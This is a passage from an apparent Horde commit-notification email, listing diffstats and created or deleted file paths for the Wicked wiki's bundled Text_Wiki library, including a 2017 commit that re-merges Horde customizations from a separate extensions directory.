 .../Text_Wiki/Text/Wiki/Render/Tiki/Emphasis.php   |   23 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Freelink.php   |    9 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Function.php   |   70 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Heading.php    |   13 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Horiz.php  |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Html.php   |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Image.php  |   42 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Include.php    |    8 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Interwiki.php  |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Italic.php |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/List.php   |   51 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Newline.php    |   12 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Paragraph.php  |   27 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Phplookup.php  |   25 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Prefilter.php  |   25 +
 .../Text/Wiki/Render/Tiki/Preformatted.php         |   48 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Tiki/Raw.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Redirect.php   |   42 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Revise.php |   37 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Strong.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Subscript.php  |   30 +
 .../Text/Wiki/Render/Tiki/Superscript.php          |   30 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Table.php  |   71 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Tighten.php    |   10 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Tiki/Toc.php |   25 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Tiki/Tt.php  |   29 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Underline.php  |   23 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Tiki/Url.php |   40 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Wikilink.php   |   36 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml.php    |  107 ++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Address.php   |   54 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Anchor.php    |   48 +
 .../Text/Wiki/Render/Xhtml/Blockquote.php          |   72 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Bold.php  |   57 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Box.php   |   62 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Break.php |   52 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Center.php    |   62 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Code.php  |  133 ++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Colortext.php |   79 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Deflist.php   |   87 ++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Delimiter.php |   46 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Embed.php |   46 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Emphasis.php  |   58 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Font.php  |   83 ++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Freelink.php  |   35 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Function.php  |  108 ++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Heading.php   |   88 ++
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Horiz.php |   51 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Html.php  |   47 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Image.php |  184 +++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Include.php   |   32 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Interwiki.php |  103 ++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Italic.php    |   57 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/List.php  |  172 +++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Newline.php   |   35 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Page.php  |   46 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Paragraph.php |   59 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Phplookup.php |   81 ++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Plugin.php    |   47 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Prefilter.php |   34 +
 .../Text/Wiki/Render/Xhtml/Preformatted.php        |   47 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Raw.php   |   46 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Revise.php    |   68 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Smiley.php    |   74 +
 .../Text/Wiki/Render/Xhtml/Specialchar.php         |   52 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Strong.php    |   58 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Subscript.php |   57 +
 .../Text/Wiki/Render/Xhtml/Superscript.php         |   57 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Table.php |  140 ++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Tighten.php   |   34 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Titlebar.php  |   57 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Toc.php   |  116 ++
 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml/Tt.php |   58 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Underline.php |   57 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Url.php   |  131 ++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Wikilink.php  |  177 +++
 wicked/lib/Text_Wiki/Text/Wiki/Tiki.php            |   92 ++
 wicked/lib/Text_Wiki/composer.json                 |   41 +
 wicked/lib/Text_Wiki/doc/BBCodeParser.php          |  427 ++++++
 wicked/lib/Text_Wiki/doc/BBCodeParser_V2.ini       |  160 ++
 wicked/lib/Text_Wiki/doc/BBtest.txt                |  103 ++
 wicked/lib/Text_Wiki/doc/README_BBCodeParser       |   45 +
 wicked/lib/Text_Wiki/doc/parser.php                |  121 ++
 wicked/lib/Text_Wiki/doc/test_Text_Wiki.php        |  184 +++
 wicked/lib/Text_Wiki/package.xml                   |  526 +++++++
 wicked/lib/Text_Wiki/packageBBCode.xml             |  146 ++
 wicked/lib/Text_Wiki/packageCowiki.xml             |  144 ++
 wicked/lib/Text_Wiki/packageCreole.xml             |  132 ++
 wicked/lib/Text_Wiki/packageDoku.xml               |  140 ++
 wicked/lib/Text_Wiki/packageMediawiki.xml          |  160 ++
 wicked/lib/Text_Wiki/packageTiki.xml               |  178 +++
 wicked/lib/Text_Wiki/tests/AllTests.php            |   41 +
 wicked/lib/Text_Wiki/tests/BBCode/7908.phpt        |  243 ++++
 wicked/lib/Text_Wiki/tests/Cowiki_Render_Url.phpt  |   18 +
 wicked/lib/Text_Wiki/tests/Creole_Parse_Url.phpt   |   70 +
 wicked/lib/Text_Wiki/tests/Creole_Render_Url.phpt  |   18 +
 .../Text_Wiki/tests/Default_Parse_BlockQuote.phpt  |   72 +
 wicked/lib/Text_Wiki/tests/Docbook_Render_Url.phpt |   14 +
 wicked/lib/Text_Wiki/tests/Doku_Render_Url.phpt    |   18 +
 wicked/lib/Text_Wiki/tests/Latex_Render_Url.phpt   |   20 +
 wicked/lib/Text_Wiki/tests/Plain_Render_Url.phpt   |   15 +
 wicked/lib/Text_Wiki/tests/Text_Wiki_BugTests.php  |   56 +
 .../tests/Text_Wiki_Generic_Transform_Tests.php    |   36 +
 .../tests/Text_Wiki_Parse_Mediawiki_Tests.php      |  765 ++++++++++
 .../Text_Wiki/tests/Text_Wiki_Parse_Tiki_Tests.php |  127 ++
 .../lib/Text_Wiki/tests/Text_Wiki_Render_Tests.php |   98 ++
 .../tests/Text_Wiki_Render_Tiki_Tests.php          |  728 +++++++++
 wicked/lib/Text_Wiki/tests/Text_Wiki_Tests.php     |  505 +++++++
 wicked/lib/Text_Wiki/tests/Xhtml_Render_Url.phpt   |   15 +
 wicked/lib/Text_Wiki/tests/fixtures/bug11649.txt   |  521 +++++++
 .../Text_Wiki/tests/fixtures/mediawiki_syntax.txt  |  123 ++
 .../mediawiki_syntax_to_test_preformatted.txt      |   10 +
 .../fixtures/mediawiki_syntax_to_test_raw.txt      |    9 +
 .../fixtures/mediawiki_syntax_to_test_wikilink.txt |   88 ++
 .../test_mediawiki_to_tiki_lists_output.txt        |   17 +
 .../test_mediawiki_to_tiki_lists_source.txt        |   18 +
 .../fixtures/test_mediawiki_to_tiki_output.txt     |   52 +
 .../test_mediawiki_to_tiki_redirect_output.txt     |    3 +
 .../test_mediawiki_to_tiki_redirect_source.txt     |    2 +
 .../fixtures/test_mediawiki_to_tiki_source.txt     |   58 +
 .../test_mediawiki_wikilink_expected_matches.php   |   70 +
 .../test_tiki_heading_expected_matches.php         |   60 +
 .../fixtures/test_tiki_to_tiki_heading_source.txt  |   11 +
 .../fixtures/text_wiki_sample_mediawiki_syntax.txt |   66 +
 ...ext_wiki_sample_syntax_transformed_to_plain.txt |   64 +
 ...xt_wiki_sample_syntax_transformed_to_plain2.txt |   64 +
 ...ext_wiki_sample_syntax_transformed_to_xhtml.txt |   70 +
 .../lib/Text_Wiki/tests/fixtures/tiki_syntax.txt   |   23 +
 621 files changed, 47131 insertions(+)

http://github.com/horde/horde/commit/100041132db172e2e88fc12b8c6d0bfc4e309d18

-----------------------------------------------------------------------

commit f8bbefdb445773d851083ede7e348a9f9507d431
Author: Jan Schneider 
Date:   Mon Sep 4 17:59:17 2017 +0200

    Re-merge Horde customizations and extensions.

 .../Text_Wiki/Text/Wiki/Parse/BBCode/Attribute.php |  52 +++++++
 .../lib/Text_Wiki/Text/Wiki/Parse/BBCode/Code2.php |  10 ++
 .../Text_Wiki/Text/Wiki/Parse/BBCode/Image2.php    |  10 ++
 .../Text/Wiki/Parse/BBCode/Registrylink.php        |  44 ++++++
 .../Text/Wiki/Parse/BBCode/Wickedblock.php         |  45 ++++++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Attribute.php |  52 +++++++
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Code2.php |  10 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Freelink2.php |  10 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Heading2.php  |  15 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Image2.php    |  10 ++
 .../Text/Wiki/Parse/Cowiki/Registrylink.php        |  44 ++++++
 .../Text/Wiki/Parse/Cowiki/Wickedblock.php         |  45 ++++++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Wikilink2.php |  10 ++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Attribute.php |  52 +++++++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Heading2.php  |  12 ++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Image2.php    |  10 ++
 .../Text/Wiki/Parse/Creole/Registrylink.php        |  44 ++++++
 .../Text/Wiki/Parse/Creole/Wickedblock.php         |  45 ++++++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Wikilink2.php |  10 ++
 .../Text/Wiki/Parse/Default/Attribute.php          |  52 +++++++
 .../Text_Wiki/Text/Wiki/Parse/Default/Code2.php    |  13 ++
 .../Text/Wiki/Parse/Default/Freelink2.php          |  10 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Heading2.php |  16 +++
 .../Text_Wiki/Text/Wiki/Parse/Default/Image2.php   |  10 ++
 .../Text/Wiki/Parse/Default/Registrylink.php       |  44 ++++++
 .../lib/Text_Wiki/Text/Wiki/Parse/Default/Toc2.php |  86 +++++++++++
 .../Text/Wiki/Parse/Default/Wickedblock.php        |  45 ++++++
 .../Text/Wiki/Parse/Default/Wikilink2.php          |  10 ++
 .../Text/Wiki/Parse/Mediawiki/Attribute.php        |  52 +++++++
 .../Text_Wiki/Text/Wiki/Parse/Mediawiki/Code2.php  |  10 ++
 .../Text/Wiki/Parse/Mediawiki/Heading2.php         |  12 ++
 .../Text_Wiki/Text/Wiki/Parse/Mediawiki/Image2.php |  10 ++
 .../Text/Wiki/Parse/Mediawiki/Registrylink.php     |  44 ++++++
 .../Text/Wiki/Parse/Mediawiki/Wickedblock.php      |  45 ++++++
 .../Text/Wiki/Parse/Mediawiki/Wikilink2.php        |  63 +++++++++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Attribute.php   |  52 +++++++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Code2.php   |  10 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Freelink2.php   |  10 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Heading2.php    |  12 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Image2.php  |  10 ++
 .../Text/Wiki/Parse/Tiki/Registrylink.php          |  44 ++++++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Wickedblock.php |  45 ++++++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Wikilink2.php   |  10 ++
 .../Text_Wiki/Text/Wiki/Render/Latex/Heading2.php  |   7 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Toc2.php  |   7 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Heading2.php  |   7 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Toc2.php  |   7 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst.php      |  39 +++++
 .../Text_Wiki/Text/Wiki/Render/Rst/Blockquote.php  |  59 ++++++++
 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Bold.php |  49 +++++++
 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Code.php |  43 ++++++
 .../lib/Text_Wiki/Text/Wiki/Render/Rst/Deflist.php |  87 ++++++++++++
 .../Text_Wiki/Text/Wiki/Render/Rst/Emphasis.php    |  46 ++++++
 .../Text_Wiki/Text/Wiki/Render/Rst/Freelink.php    |  53 +++++++
 .../Text_Wiki/Text/Wiki/Render/Rst/Heading2.php    | 103 ++++++++++++++
 .../lib/Text_Wiki/Text/Wiki/Render/Rst/Horiz.php   |  39 +++++
 .../lib/Text_Wiki/Text/Wiki/Render/Rst/Links.php   |  48 +++++++
 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/List.php |  65 +++++++++
 .../lib/Text_Wiki/Text/Wiki/Render/Rst/Newline.php |  43 ++++++
 .../Text_Wiki/Text/Wiki/Render/Rst/Paragraph.php   |  52 +++++++
 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Raw.php  |  43 ++++++
 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Toc2.php |  57 ++++++++
 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Tt.php   |  43 ++++++
 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Url.php  |  58 ++++++++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Attribute.php |  53 +++++++
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Code2.php |  28 ++++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Freelink2.php |   5 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Heading2.php  |   7 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Image2.php    | 157 +++++++++++++++++++++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Interwiki.php | 115 +++++----------
 .../Text/Wiki/Render/Xhtml/Registrylink.php        |  29 ++++
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Toc2.php  |  92 ++++++++++++
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Url.php   | 138 ++++--------------
 .../Text/Wiki/Render/Xhtml/Wickedblock.php         |  33 +++++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Wikilink2.php | 110 +++++++++++++++
 .../Parse/BBCode/Attribute.php                     |  52 -------
 .../Text_Wiki_Extensions/Parse/BBCode/Code2.php    |  10 --
 .../Text_Wiki_Extensions/Parse/BBCode/Image2.php   |  10 --
 .../Parse/BBCode/Registrylink.php                  |  44 ------
 .../Parse/BBCode/Wickedblock.php                   |  45 ------
 .../Parse/Cowiki/Attribute.php                     |  52 -------
 .../Text_Wiki_Extensions/Parse/Cowiki/Code2.php    |  10 --
 .../Parse/Cowiki/Freelink2.php                     |  10 --
 .../Text_Wiki_Extensions/Parse/Cowiki/Heading2.php |  15 --
 .../Text_Wiki_Extensions/Parse/Cowiki/Image2.php   |  10 --
 .../Parse/Cowiki/Registrylink.php                  |  44 ------
 .../Parse/Cowiki/Wickedblock.php                   |  45 ------
 .../Parse/Cowiki/Wikilink2.php                     |  10 --
 .../Parse/Creole/Attribute.php                     |  52 -------
 .../Text_Wiki_Extensions/Parse/Creole/Heading2.php |  12 --
 .../Text_Wiki_Extensions/Parse/Creole/Image2.php   |  10 --
 .../Parse/Creole/Registrylink.php                  |  44 ------
 .../Parse/Creole/Wickedblock.php                   |  45 ------
 .../Parse/Creole/Wikilink2.php                     |  10 --
 .../Parse/Default/Attribute.php                    |  52 -------
 .../Text_Wiki_Extensions/Parse/Default/Code2.php   |  13 --
 .../Parse/Default/Freelink2.php                    |  10 --
 .../Parse/Default/Heading2.php                     |  16 ---
 .../Text_Wiki_Extensions/Parse/Default/Image2.php  |  10 --
 .../Parse/Default/Registrylink.php                 |  44 ------
 .../Text_Wiki_Extensions/Parse/Default/Toc2.php    |  86 -----------
 .../Parse/Default/Wickedblock.php                  |  45 ------
 .../Parse/Default/Wikilink2.php                    |  10 --
 .../Parse/Mediawiki/Attribute.php                  |  52 -------
 .../Text_Wiki_Extensions/Parse/Mediawiki/Code2.php |  10 --
 .../Parse/Mediawiki/Heading2.php                   |  12 --
 .../Parse/Mediawiki/Image2.php                     |  10 --
 .../Parse/Mediawiki/Registrylink.php               |  44 ------
 .../Parse/Mediawiki/Wickedblock.php                |  45 ------
 .../Parse/Mediawiki/Wikilink2.php                  |  63 ---------
 .../Text_Wiki_Extensions/Parse/Tiki/Attribute.php  |  52 -------
 .../lib/Text_Wiki_Extensions/Parse/Tiki/Code2.php  |  10 --
 .../Text_Wiki_Extensions/Parse/Tiki/Freelink2.php  |  10 --
 .../Text_Wiki_Extensions/Parse/Tiki/Heading2.php   |  12 --
 .../lib/Text_Wiki_Extensions/Parse/Tiki/Image2.php |  10 --
 .../Parse/Tiki/Registrylink.php                    |  44 ------
 .../Parse/Tiki/Wickedblock.php                     |  45 ------
 .../Text_Wiki_Extensions/Parse/Tiki/Wikilink2.php  |  10 --
 .../Text_Wiki_Extensions/Render/Latex/Heading2.php |   7 -
 .../lib/Text_Wiki_Extensions/Render/Latex/Toc2.php |   7 -
 .../Text_Wiki_Extensions/Render/Plain/Heading2.php |   7 -
 .../lib/Text_Wiki_Extensions/Render/Plain/Toc2.php |   7 -
 wicked/lib/Text_Wiki_Extensions/Render/Rst.php     |  39 -----
 .../Text_Wiki_Extensions/Render/Rst/Blockquote.php |  59 --------
 .../lib/Text_Wiki_Extensions/Render/Rst/Bold.php   |  49 -------
 .../lib/Text_Wiki_Extensions/Render/Rst/Code.php   |  43 ------
 .../Text_Wiki_Extensions/Render/Rst/Deflist.php    |  87 ------------
 .../Text_Wiki_Extensions/Render/Rst/Emphasis.php   |  46 ------
 .../Text_Wiki_Extensions/Render/Rst/Freelink.php   |  53 -------
 .../Text_Wiki_Extensions/Render/Rst/Heading2.php   | 103 --------------
 .../lib/Text_Wiki_Extensions/Render/Rst/Horiz.php  |  39 -----
 .../lib/Text_Wiki_Extensions/Render/Rst/Links.php  |  48 -------
 .../lib/Text_Wiki_Extensions/Render/Rst/List.php   |  65 ---------
 .../Text_Wiki_Extensions/Render/Rst/Newline.php    |  43 ------
 .../Text_Wiki_Extensions/Render/Rst/Paragraph.php  |  52 -------
 wicked/lib/Text_Wiki_Extensions/Render/Rst/Raw.php |  43 ------
 .../lib/Text_Wiki_Extensions/Render/Rst/Toc2.php   |  57 --------
 wicked/lib/Text_Wiki_Extensions/Render/Rst/Tt.php  |  43 ------
 wicked/lib/Text_Wiki_Extensions/Render/Rst/Url.php |  58 --------
 .../Render/Xhtml/Attribute.php                     |  53 -------
 .../Text_Wiki_Extensions/Render/Xhtml/Code2.php    |  28 ----
 .../Render/Xhtml/Freelink2.php                     |   5 -
 .../Text_Wiki_Extensions/Render/Xhtml/Heading2.php |   7 -
 .../Text_Wiki_Extensions/Render/Xhtml/Image2.php   | 157 ---------------------
 .../Render/Xhtml/Interwiki.php                     |  56 --------
 .../Render/Xhtml/Registrylink.php                  |  29 ----
 .../lib/Text_Wiki_Extensions/Render/Xhtml/Toc2.php |  92 ------------
 .../lib/Text_Wiki_Extensions/Render/Xhtml/Url.php  |  47 ------
 .../Render/Xhtml/Wickedblock.php                   |  33 -----
 .../Render/Xhtml/Wikilink2.php                     | 110 ---------------
 150 files changed, 2775 insertions(+), 3009 deletions(-)
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/BBCode/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/BBCode/Code2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/BBCode/Image2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/BBCode/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/BBCode/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Code2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Freelink2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Image2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Creole/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Creole/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Creole/Image2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Creole/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Creole/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Creole/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Code2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Freelink2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Image2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Toc2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Mediawiki/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Mediawiki/Code2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Mediawiki/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Mediawiki/Image2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Mediawiki/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Mediawiki/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Mediawiki/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Code2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Freelink2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Image2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Latex/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Latex/Toc2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Plain/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Plain/Toc2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Blockquote.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Bold.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Code.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Deflist.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Emphasis.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Freelink.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Horiz.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Links.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/List.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Newline.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Paragraph.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Raw.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Toc2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Tt.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Rst/Url.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml/Code2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml/Freelink2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml/Image2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml/Toc2.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/BBCode/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/BBCode/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/BBCode/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/BBCode/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/BBCode/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Freelink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Wickedblock.php
